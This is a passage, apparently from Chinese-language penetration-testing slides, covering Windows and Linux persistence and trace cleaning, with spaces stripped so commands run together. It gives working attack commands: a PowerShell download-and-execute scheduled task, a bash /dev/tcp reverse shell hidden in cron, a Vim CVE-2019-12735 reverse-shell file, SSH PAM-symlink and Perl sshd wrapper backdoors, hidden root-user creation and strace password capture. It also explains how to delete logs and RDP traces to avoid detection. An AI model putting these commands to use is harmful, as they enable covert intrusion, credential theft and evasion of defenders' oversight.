Script"/tr"powershell.exe-nop-whidden-c\"IEX((new-objectnet.webclient).downloadstring(\"\"\"31:80/a\"\"\"))\""容易遇到的問題：cmd命令行執(zhí)行單引號會被替換成雙引號故這里使用三個雙引號替代。計劃腳本每1分鐘運行一次。Windows自啟動服務(wù)后門在Windows上還有一個重要的機制，也就是服務(wù)。服務(wù)程序通常默默的運行在后臺，且擁有SYSTEM權(quán)限，非常適合用于后門持久化。我們可以將EXE/DLL等可執(zhí)行文件注冊為服務(wù)實現(xiàn)后門持久化。powershell創(chuàng)建服務(wù)New-Service-Name"服務(wù)名稱"-BinaryPathName"可執(zhí)行文件路徑"-Description"服務(wù)描述"-StartupTypeAutomaticscstartpentestlabWindows文件關(guān)聯(lián)assoc，顯示或修改文件擴展名關(guān)聯(lián)。如果在沒有參數(shù)的情況下使用，則assoc將顯示所有當前文件擴展名關(guān)聯(lián)的列表。assoc[.ext[=[FileType]]]assoc.txt=batfile(以bat方式打開txt文件）用ftype命令顯示或修改用在文件擴展名關(guān)聯(lián)中的文件類型。Windows文件關(guān)聯(lián)修改\HKEY_CLASS_ROOT\txtfile\shell\open\command的默認值為我們要執(zhí)行的程序regadd"HKCR\txtfile\shell\open\command"/ve/tREG_EXPAND_SZ/d"C:\Windows\system32\cmd.exe%1"/flinux隱藏文件及文件夾Linux下建立mkdir.hiddentouch.1.txt在文件夾或者文件名稱前加.代表隱藏文件需要通過ls–a才能查看到linux添加普通用戶#創(chuàng)建一個用戶名guest，密碼123456的普通用戶useradd-p`opensslpasswd-1-salt'salt'123456`guest#useradd-p方法``是用來存放可執(zhí)行的系統(tǒng)命令,"$()"也可以存放命令執(zhí)行語句useradd-p"$(opensslpasswd-1123456)"guest#chpasswd方法useraddguest;echo'guest:123456'|chpasswd#echo-e方法useraddtest;echo-e"123456\n123456\n"|passwdtestlinux一句話添加root用戶#創(chuàng)建一個用戶名guest，密碼123456的root用戶useradd-p`opensslpasswd-1-salt'salt'123456`bob2-o-u0-groot-Groot-s/bin/bash-mlinux隱身登錄隱身登錄系統(tǒng)，不會被last、who、w等指令檢測到ssh-Tusername@host/bin/bash-ilinuxssh公鑰登陸1.生成密鑰對：ssh-keygen-trsa打開終端，使用下面的ssh-keygen來生成RSA密鑰和公鑰．-t表示type，就是說要生成RSA加密的鑰匙．linuxssh公鑰登陸生成SSHKey的過程中會要求你指定一個文件來保存密鑰，按Enter鍵使用默認的文件就行了．然后需要輸入一個密碼來加密你的SSHKey．密碼至少要20位長度．SSH密鑰會保存在home目錄下的.ssh/id_rsa文件中．SSH公鑰保存在.ssh/id_rsa.pub文件中．linuxssh公鑰登陸２.將SSH公鑰上傳到Linux服務(wù)器可以使用ssh-copy-id命令來完成．ssh-copy-idusername@remote-server也可以將公鑰內(nèi)容直接寫入目標服務(wù)器的.ssh/authorized_keys文件里linux軟鏈接后門在sshd服務(wù)配置啟用PAM認證的前提下，PAM配置文件中控制標志為sufficient時，只要pam_rootok模塊檢測uid為0（root）即可成功認證登錄。通俗點來說，一是sshd服務(wù)啟用PAM認證機制，在/etc/ssh/sshd_config文件中，設(shè)置UsePAM為yes。如果不啟用PAM，系統(tǒng)嚴格驗證用戶密碼，不能建立后門。二是在/etc/pam.d/目錄下，對應(yīng)文件里包含"authsufficientpam_rootok.so"配置，只要PAM配置文件中包含此配置即可SSH任意密碼登錄。對比一下/etc/pam.d/sshd配置文件和/etc/pam.d/su配置文件，不難發(fā)現(xiàn)，前者沒有包含如上配置，而后者包含該配置。pam_rootok.so主要作用是使得uid為0的用戶，即root用戶可以直接通過認證而不需要輸入密碼。我們查看/etc/pam.d/su文件中，我們可以看到使用了該模塊，這也是為什么root用戶切換至普通用戶不需要密碼的原因。1.PAM認證機制，若sshd服務(wù)中開啟了PAM認證機制（默認開啟），當程序執(zhí)行時，PAM模塊則會搜尋PAM相關(guān)設(shè)定文件，設(shè)定文件一般是在/etc/pam.d/。若關(guān)閉則會驗證密碼，無法建立軟鏈接后門。2.當我們通過特定的端口連接ssh后，應(yīng)用在啟動過程中就會去找到配置文件，如：我們的軟鏈接文件為/tmp/su，那么應(yīng)用就會找/etc/pam.d/su作為配置文件，那么則實現(xiàn)了無密登錄。查找可以利用的軟連接后門：find/etc/pam.d|xargsgrep"pam_rootok"利用前提：允許PAM認證(默認)：cat/etc/ssh/sshd_configlinux軟鏈接后門建立后門：ln-sf/usr/sbin/sshd/usr/local/su;/usr/local/su-oPort=12345執(zhí)行完之后，任何一臺機器sshroot@IP-p12345，輸入任意密碼，成功登錄端口盡量跟業(yè)務(wù)端口靠近或者一些常見端口以便混淆視聽，目錄不要設(shè)置在/tmp下，可以結(jié)合計劃任務(wù)，或者設(shè)置開機啟動腳本使用1.記錄原來的版本號：ssh–V2.下載對應(yīng)版本或版本略高一點/ubuntu/+source/openssh/pkg/openssh/pub/OpenBSD/OpenSSH/portable/3.修改源碼(sshconnect2.c/auth-passwd.c/monitor.c)linuxopenssh后門linuxopenssh后門linuxopenssh后門linuxopenssh后門linuxopenssh后門3.更改版本號version.h4.編譯安裝linuxSUID后門linuxcron后門Tips:ubuntu默認tty為dash，不能用來反彈或者對外連接，需要修改默認tty為bash方式如下：sudodpkg-reconfiguredash然后選No查看切換后的結(jié)果ls-al/bin/sh1.準備反彈腳本test.sh#!/bin/bashbash-i>&/dev/tcp/31/88990>&1賦予執(zhí)行權(quán)限：chmod+sxtest.sh2.隱藏效果：(printf"*/1****/bin/bash/root/test.sh;\rnocrontabfor`whoami`%100c\n")|crontab–\r導致顯示截斷，使得后面的內(nèi)容逐個字符覆蓋前面的字符；100%c的作用是格式化輸出一個字符，前面99個空格補齊。3.Vim/var/spool/cron/crontabs/rootlinuxcron后門受影響版本：Vim<8.1.1365,Neovim<0.3.6創(chuàng)建反彈shell.txtecho':!rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|nc318888>/tmp/f||"vi:fen:fdm=expr:fde=assert_fails("source\!\\%"):fdl=0:fdt="'>shell.txtlinuxvim后門(CVE-2019-12735)linuxICMP后門借助工具實現(xiàn)：/andreafabrizi/prismRootkits最早是一組用于UNIX操作系統(tǒng)的工具集，黑客使用它們隱藏入侵活動的痕跡，它能在操作系統(tǒng)中隱藏惡意程序。這些程序在植入系統(tǒng)后，rootkits會將它們隱藏起來，它能隱藏任何惡意程序過程、文件夾、注冊碼。相關(guān)項目：/milabs/awesome-linux-rootkitsReptile：/f0rb1dd3n/Reptile隱藏進程，提升權(quán)限，反彈shell,隱藏TCP/UDP鏈接，隱藏目錄linuxrootkit后門strace是一個動態(tài)跟蹤工具，它可以跟蹤系統(tǒng)調(diào)用的執(zhí)行。我們可以把他當成一個鍵盤記錄的后門，來擴大我們的信息收集范圍通過其他方式拿到shell,通過history、流量抓包、或者本地沒有翻到密碼的情況。我們想要獲取當前主機的密碼，或者通過這臺主機連接到其他主機的密碼。1.執(zhí)行下列命令，記錄密碼到/tmp/.sshd.log(strace-f-F-p`psaux|grep"sshd-D"|grep-vgrep|awk{'print$2'}`-t-etrace=read,write-s322>/tmp/.sshd.log&)linuxstrace記錄密碼3.記錄私鑰（雞肋）(strace-f-F-p`psaux|grep"sshd-D"|grep-vgrep|awk{'print$2'}`-t-etrace=read,write-s40962>/tmp/.sshd.log&)2.當有用戶登錄時.sshd.log文件會有記錄，使用下面命令查看grep-E'read\(6,".+\\0\\0\\0\\.+"'/tmp/.sshd.loggrep'PRIVATEKEY'/tmp/.sshd.loglinuxstrace記錄密碼操作方式--目標機器cd/usr/sbin/mvsshd../bin/echo‘#!/usr/bin/perl’>sshdecho'exec"/bin/sh"if(getpeername(STDIN)=~/^..4A/);'>>sshd//4A是13377的小端模式echo'exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV,'>>sshdchmodu+xsshdservicesshdrestart

#ubuntu18.04重啟sshd服務(wù)/etc/init.d/sshdrestart

#ubuntu

16.04

以下重啟sshd服務(wù)后門代碼解釋：第一行，如果當前文件句柄STDIN是一個socket，且socket的遠程連接源端口是31334（Big網(wǎng)絡(luò)字節(jié)序中的16進制字符串為\x00\x00zf，正好匹配上perl正則..zf，上述代碼中的zf是Big網(wǎng)絡(luò)字節(jié)序的Ascii表示形式），則執(zhí)行/bin/sh，并結(jié)束當前程序運行（不會執(zhí)行第二步），相當于反彈一個rootshell（因為sshd是以root權(quán)限運行的）給遠程socket（一般只有攻擊者指定連接的源端口才能觸發(fā)這一行的執(zhí)行）第二行，啟動sshd(/usr/bin/sshd是真正的sshd)服務(wù)，凡是傳遞給/usr/sbin/sshd(后門)的參數(shù)都傳遞給真正的sshd（這一行保證了普通用戶也可以正常使用ssh服務(wù)，登錄并不會有什么異常現(xiàn)象）linuxssh正向后門操作方式--攻擊機器sudosocatSTDIOTCP4:28:22,SOURCEPORT=13377linuxssh正向后門權(quán)限提升信息收集橫向滲透后門持久化痕跡清理痕跡清理痕跡清理，是清理自己在目標機器上留下的所有操作痕跡。其主要目的是：避免溯源避免被發(fā)現(xiàn)隱藏攻擊方法

有一點需要注意的是，如果在我們獲取到服務(wù)器權(quán)限之前，并且為做一些避免設(shè)備記錄日子的操作的話，日志有可能會被同步發(fā)送到日志審計系統(tǒng)上，所以還是可以基于日審查到蛛絲馬跡的Windows本地審核策略開啟了相應(yīng)策略的話就會在日志上有體現(xiàn)，默認是全部關(guān)閉的，默認情況下在安全日志中只會記錄登陸成功的信息。Windows日志W(wǎng)indows日志包含9個元素：日期/時間、事件類型、用戶、計算機、事件ID、來源、類別、描述、數(shù)據(jù)Windows操作系統(tǒng)在運行生命周期，以特定數(shù)據(jù)結(jié)構(gòu)方式存儲、記錄OS大量運行的日志信息，主要包括：Windows事件日志（EventLog）、WindowsWebServerIIS日志、WindowsFTP日志、ExchangeServer郵件服務(wù)、MSSQLServer數(shù)據(jù)庫日志等.系統(tǒng)內(nèi)置3個核心日志文件（System、Security、Application）;默認大小均為20480KB（20MB）,數(shù)據(jù)超過20MB，默認系統(tǒng)將優(yōu)先覆蓋過期日志記錄。應(yīng)用程序、服務(wù)日志默認最大1024KB，超過最大限制也優(yōu)先覆蓋過期的日志記錄Windows日志事件IDWindows日志記錄事件4624(舊Windows事件ID528)時，事件日志中也會列出登錄類型。下表介紹了每種登錄類型。Windows日志可以利用ID來快速定位篩選Windows日志日志記錄流程Windows日志System系統(tǒng)日志：系統(tǒng)進程、設(shè)備、磁盤活動等。記錄了設(shè)備驅(qū)動無法正常啟動或停止，硬件失敗，重復IP地址，系統(tǒng)進程的啟動，停止及暫停等行為。默認位置：%SystemRoot%\System32\Winevt\Logs\System.evtxSecurity安全日志：包含安全性相關(guān)的事件。e.g.用戶權(quán)限變更，登錄及注銷，文件/文件夾訪問等信息。默認位置：%SystemRoot%\System32\Winevt\Logs\Security.evtxApplication應(yīng)用程序日志：包含操作系統(tǒng)安裝的應(yīng)用程序軟件相關(guān)的事件。事件包括了錯誤、警告及任何應(yīng)用程序需要報告的信息，應(yīng)用程序開發(fā)人員可以決定記錄哪些信息。默認位置：%SystemRoot%\System32\Winevt\Logs\Application.evtxWindows清理日志清除所有日志清理日志，會產(chǎn)生一條日志清理記錄Windows清理日志工具清除：/hlldz/Phant0m/QAX-A-Team/EventCleaner/QAX-A-Team/EventLogMasterWindows痕跡清理清理3389痕跡當我們使用一臺主機連接另一臺主機的3389端口，客戶端主機的%userprofile%\documents\文件夾下會生成一個default.rdp文件，該文件保存了遠程連接的相關(guān)配置信息清理3389痕跡注冊表中也有相關(guān)記錄regdelete"HKEY_CURRENT_USER\Software\Microsoft\TerminalServerClient\Default"/va/fregdelete"HKEY_CURRENT_USER\Software\Microsoft\TerminalServerClient\Servers"/fregadd"HKEY_CURRENT_USER\Software\Microsoft\TerminalServerClient\S